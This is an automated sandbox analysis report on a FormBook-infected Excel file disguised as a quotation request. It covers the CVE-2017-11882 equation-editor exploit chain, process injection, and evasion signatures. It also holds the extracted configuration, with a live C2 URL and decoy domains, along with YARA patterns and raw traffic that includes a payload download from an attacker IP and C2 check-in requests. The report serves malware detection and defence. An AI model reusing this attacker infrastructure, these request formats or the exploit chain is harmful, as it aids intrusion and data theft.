Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Quotation Request - Alligator Pty Ltd.xlsx

Overview

General Information

Sample Name:Quotation Request - Alligator Pty Ltd.xlsx
Analysis ID:532880
MD5:90e995ae2b06b84644586091a994f43a
SHA1:a6c83577fd947650a6b816fd910ebb7fd3464bca
SHA256:1e8d78f614b82c1bdc730e745228b860d5b71888ac90efbf5d74af4ea3f876f9
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2212 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1160 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2556 cmdline: "C:\Users\Public\vbc.exe" MD5: 8E90E8E526BC80036BA6B50A913A1880)
      • vbc.exe (PID: 2080 cmdline: "C:\Users\Public\vbc.exe" MD5: 8E90E8E526BC80036BA6B50A913A1880)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2952 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2032 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dubaibiologicdentist.com/hf9j/"], "decoy": ["afrifarmgroup.com", "coffeeassiciation.com", "unlimit-ed.com", "guy.rest", "dnemperor.com", "ringstorule.com", "reelnasty.com", "travelgleam.com", "sagestyleresale.com", "jiaoyizhuan.club", "fastred.biz", "xn--fiqs8srv0ahj5a.xn--czru2d", "eden-foundation.com", "exquisite-epoxy-systems.com", "luxurycaroffer.com", "sdffzc.com", "suvsdealsonlinesearchdusorg.com", "weihaits.com", "fetch-us-mtg-refi.zone", "uterinevmkvhm.online", "redcarpetwithrob.online", "puertasautomaticassalceda.com", "blockchainsupport.global", "lalasushi.com", "picaworks.online", "airductcleaningindianapolis.net", "maximumdouglas.com", "bs2860.com", "pharmaceuticalmarking.com", "billionaireroyalties.com", "libertarias.wiki", "cupsnax.com", "koutarouserver.com", "crazydealeon.com", "amoraprimeirajogada.com", "fearlessfashionaccessories.biz", "ella.tech", "breackae.xyz", "hostmatadvice.com", "aestheticnursearie.com", "henryzingo.com", "folpro.com", "kooles.com", "rushingrofogg.xyz", "377techan.com", "sprookjesbosch.store", "newsymphonie.net", "lawswashington.com", "homesandhorses.net", "jacobalexandermusic.com", "ll1ysq.biz", "faceresurfacing.com", "thekeappro.com", "joycemalaysiaproperty.com", "traexcel.com", "subsoilcorp.com", "thejoannaha.com", "477karakabayrd.com", "bfcmtld.com", "kuratours.com", "group-place.com", "sixtreechina.com", "rattansagar.com", "ascenddronenews.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1160, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlogon[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2556
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1160, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2556

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dubaibiologicdentist.com/hf9j/"], "decoy": ["afrifarmgroup.com", "coffeeassiciation.com", "unlimit-ed.com", "guy.rest", "dnemperor.com", "ringstorule.com", "reelnasty.com", "travelgleam.com", "sagestyleresale.com", "jiaoyizhuan.club", "fastred.biz", "xn--fiqs8srv0ahj5a.xn--czru2d", "eden-foundation.com", "exquisite-epoxy-systems.com", "luxurycaroffer.com", "sdffzc.com", "suvsdealsonlinesearchdusorg.com", "weihaits.com", "fetch-us-mtg-refi.zone", "uterinevmkvhm.online", "redcarpetwithrob.online", "puertasautomaticassalceda.com", "blockchainsupport.global", "lalasushi.com", "picaworks.online", "airductcleaningindianapolis.net", "maximumdouglas.com", "bs2860.com", "pharmaceuticalmarking.com", "billionaireroyalties.com", "libertarias.wiki", "cupsnax.com", "koutarouserver.com", "crazydealeon.com", "amoraprimeirajogada.com", "fearlessfashionaccessories.biz", "ella.tech", "breackae.xyz", "hostmatadvice.com", "aestheticnursearie.com", "henryzingo.com", "folpro.com", "kooles.com", "rushingrofogg.xyz", "377techan.com", "sprookjesbosch.store", "newsymphonie.net", "lawswashington.com", "homesandhorses.net", "jacobalexandermusic.com", "ll1ysq.biz", "faceresurfacing.com", "thekeappro.com", "joycemalaysiaproperty.com", "traexcel.com", "subsoilcorp.com", "thejoannaha.com", "477karakabayrd.com", "bfcmtld.com", "kuratours.com", "group-place.com", "sixtreechina.com", "rattansagar.com", "ascenddronenews.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Quotation Request - Alligator Pty Ltd.xlsxReversingLabs: Detection: 31%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.541290495.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.683120830.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.481627227.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.543081272.0000000002590000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.512689943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682689101.00000000001E0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.505045943.00000000097D3000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.480383682.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.481156695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.682544135.0000000000090000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.541124552.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.484497263.0000000001E90000.00000004.00000001.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: http://107.173.191.75/dodge/winlogon.exeAvira URL Cloud: Label: malware
      Source: 7.2.msiexec.exe.29e796c.7.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 7.2.msiexec.exe.2a35f0.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 5.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
      Source: 5.0.vbc.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 4.2.vbc.exe.1e90000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.541236797.00000000002DA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.541224912.00000000002C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.543131864.00000000025C0000.00000040.00020000.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.481808621.00000000004A0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.542128053.0000000000910000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.483202698.0000000000600000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.541453296.0000000000790000.00000040.00000001.sdmp, msiexec.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405C22 FindFirstFileA,FindClose,
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,
      Source: global trafficDNS query: name: www.travelgleam.com
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
      Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.173.191.75:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.173.191.75:80

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 47.246.136.142:80
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.subsoilcorp.com
      Source: C:\Windows\explorer.exeDomain query: www.travelgleam.com
      Source: C:\Windows\explorer.exeDomain query: www.ll1ysq.biz
      Source: C:\Windows\explorer.exeNetwork Connect: 162.210.195.97 80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.dubaibiologicdentist.com/hf9j/
      Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-WDCUS LEASEWEB-USA-WDCUS
      Source: global trafficHTTP traffic detected: GET /hf9j/?NnwLW=lTeXzRfHoPHDqpa&LnftM=Hi4i/MzZWraYpeia3tFw/razG0ol5F63XlO+NDDVDOKGXMifKzAuqwSCBSP91u5pGStR7A== HTTP/1.1Host: www.travelgleam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /hf9j/?LnftM=Pqr9SePoNfnaC1kg2G0jCGwXX1ba57NV0gLvpt/5y4PrrRm7oBIm/XhJEBzYJkmjKkGOCg==&NnwLW=lTeXzRfHoPHDqpa HTTP/1.1Host: www.sdffzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 18:18:07 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.33Last-Modified: Thu, 02 Dec 2021 08:53:53 GMTETag: "7d5a3-5d225ee196c33"Accept-Ranges: bytesContent-Length: 513443Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 40 c5 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 40 c5 02 00 00 70 03 00 00 c6 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /dodge/winlogon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.191.75Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: unknownTCP traffic detected without corresponding DNS query: 107.173.191.75
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: vbc.exe, 00000004.00000000.473056040.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000004.00000002.482277603.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.477794884.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000006.00000000.500770240.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: EXCEL.EXE, 00000000.00000002.687693304.0000000005307000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.499463550.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: vbc.exe, 00000004.00000002.484925855.0000000002360000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.497759823.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000006.00000000.531356125.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: EXCEL.EXE, 00000000.00000002.687513423.0000000005120000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.528721020.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
